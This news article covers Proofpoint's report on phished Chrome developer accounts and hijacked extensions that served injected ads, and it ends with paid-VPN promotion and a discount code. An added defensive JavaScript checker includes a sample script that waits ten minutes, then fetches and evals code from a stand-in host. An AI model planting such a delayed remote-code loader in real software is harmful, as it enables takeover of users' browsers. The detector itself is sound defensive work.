Proofpoint Spills the Details of Recent Chrome Extensions’ Hack


Thanks to security experts at Proofpoint, we now have more information about the recent hack that involved 8 Chrome extensions and two Virtual Private Networks (VPNs). The VPNs in question are TouchVPN and Betternet, and it is suspected that their subscribers might have been exposed to malicious popups and data theft at the time of the attack, which took place in June.

Kafeine, a group of researchers within Proofpoint, were the ones that made the discovery. The exploit was quite simple to execute and it involved a phishing scheme that eventually gave the attacker control over several Chrome developers’ accounts. The apps affected are the following:

  • Web Developer
  • Copyfish
  • Chrometana 1.1.3
  • Web Paint 1.2.1
  • Infinity New Tab 3.12.3
  • Social Fixer 20.1.1
  • Betternet VPN
  • TouchVPN

The goal is always money

As in most hacking cases, the motive here was profit. Once the attackers had control of the extensions, they injected unwanted JavaScript that loaded adverts on top of web pages and created a revenue stream.

The researchers say that the advert-substitution code they uncovered was mostly targeted at adult websites, but they do not rule out the possibility that adverts were substituted on other sites, too.

But it seems that there was another aspect to the hackers’ attack: many people got a JavaScript prompt telling them they needed to repair their PC. People who clicked on the legitimate-looking alert were redirected to affiliate program services, which made a profit for the hackers.

It is also possible that consumers suffered data loss due to the penetration.

Simple yet effective attack

The hackers used a simple phishing technique, the researchers say, which involved redirecting the app developers to a fake Google account login page. Once the developers typed in their login details, the attackers got hold of them and were able to make changes to the developers’ apps from the inside.

According to a post on Kafeine’s blog, this happened at the end of July and beginning of August. Several developers’ account credentials were stolen, resulting in their extensions being compromised and therefore their users being exposed to malicious popups and credential theft.

The news about the hack got around on 12 August, when one of the developers whose Google account and Chrome extension had been compromised announced it via Twitter. The developer was Chris Pederick, the maker of the popular Web Developer extension for Chrome.

The next step for the Proofpoint researchers was to download the compromised version of the extension (version 0.4.9) and extract the malicious code the attacker had put there. Once installed, the compromised version would wait 10 minutes before contacting a remote Command and Control server via HTTPS.

Then, more malicious code would be inserted into the extension from the server. These domains were found on CloudFlare, and were taken down as soon as Proofpoint flagged them.
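
An added example (not from Proofpoint's report or the original article): a heuristic static check a defender could run over an unpacked extension's scripts for the combination described above, namely a long start-up delay, a remote fetch and dynamic code execution in the same file. The threshold, file names, sample sources and `.test` hosts are constructed assumptions.

```javascript
// Heuristic static audit for the "wait, then fetch and run remote code" pattern.
const MIN_DELAY_MS = 5 * 60 * 1000; // assumed threshold for a "long" timer

// Evaluate literal delay expressions such as "600000" or "10 * 60 * 1000".
function literalDelayMs(expr) {
  const factors = expr.split('*').map((f) => f.trim());
  if (!factors.every((f) => /^\d+$/.test(f))) return null;
  return factors.reduce((acc, f) => acc * Number(f), 1);
}

function auditSource(file, source) {
  // Only timers whose callback is a plain identifier are matched (heuristic).
  const timerRe = /set(?:Timeout|Interval)\s*\(\s*[\w$.]+\s*,\s*([\d*\s]+)\)/g;
  const delays = [...source.matchAll(timerRe)]
    .map((m) => literalDelayMs(m[1]))
    .filter((ms) => ms !== null && ms >= MIN_DELAY_MS);
  // Host names of any absolute URLs embedded in the script.
  const hosts = [...source.matchAll(/https?:\/\/([^\s'"`)\/:]+)/g)].map((m) => m[1]);
  const fetchesRemote = /\bfetch\s*\(|XMLHttpRequest/.test(source) && hosts.length > 0;
  const runsDynamicCode =
    /\beval\s*\(|new\s+Function\s*\(|createElement\(\s*['"]script['"]\s*\)/.test(source);
  return {
    file,
    longDelaysMs: delays,
    remoteHosts: [...new Set(hosts)],
    runsDynamicCode,
    // Flag only when all three signals occur in the same file.
    suspicious: delays.length > 0 && fetchesRemote && runsDynamicCode,
  };
}

// Constructed sample sources; hosts use the reserved .test TLD.
const SAMPLES = {
  'badge.js': "setTimeout(refreshBadge, 2000);\n" +
    "fetch('https://api.example.test/status').then(render);\n",
  'background.js': "function checkIn() {\n" +
    "  fetch('https://updates.example.test/cfg').then((r) => r.text())\n" +
    "    .then((body) => eval(body));\n" +
    "}\n" +
    "setTimeout(checkIn, 10 * 60 * 1000);\n",
};

function auditAll(samples) {
  return Object.entries(samples).map(([file, src]) => auditSource(file, src));
}

console.log(auditAll(SAMPLES));
```

A hit is a prompt for manual review of that version's diff, not a verdict; minified or obfuscated code will evade literal-pattern checks like these.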

Betternet

For users of Betternet, who are regularly served adverts by their VPN of choice, the hack meant that the ads they were shown came from the attackers. According to one user, on the morning of 25 June, the adverts were all over Chrome. This is how it was discovered that the hack also involved VPNs.

Other Betternet users also reported having their Chrome swamped with unusual adverts, which in turn helped Betternet connect the problem to the Chrome extension. Betternet has been contacted for comment and confirmed that it had indeed suffered the ill-publicized hack. The company stated that it identified and fixed the issue the same day it occurred, on June 25.

Don’t use VPNs that serve you adverts

Incidents like this only give you more reasons not to rely on free VPNs with dodgy privacy policies. The very purpose of a VPN is to protect its users’ privacy by concealing their location and encrypting their web traffic.

Free VPNs like HotSpot Shield, Betternet, TouchVPN, and many others have stated in their privacy policies that they collect data from their users so they can target ads better. But this isn’t something a VPN should do; it’s the exact opposite.

Unfortunately, many VPNs in the industry have these poor practices and care more about the profit they are making than about their customers’ privacy.

Here are some good paid VPNs:

  • TorGuard: $5 for 1 month with code "best10VPN"; website rating 9.9
  • PIA: $6.95 a month; website rating 8.8

Features compared: multi-platform compatibility, 256-AES encryption, 24/7 live chat, residential/dedicated IP for permanent streaming access, mobile app plus PC/Mac support, stealth VPN/advanced obfuscation techniques.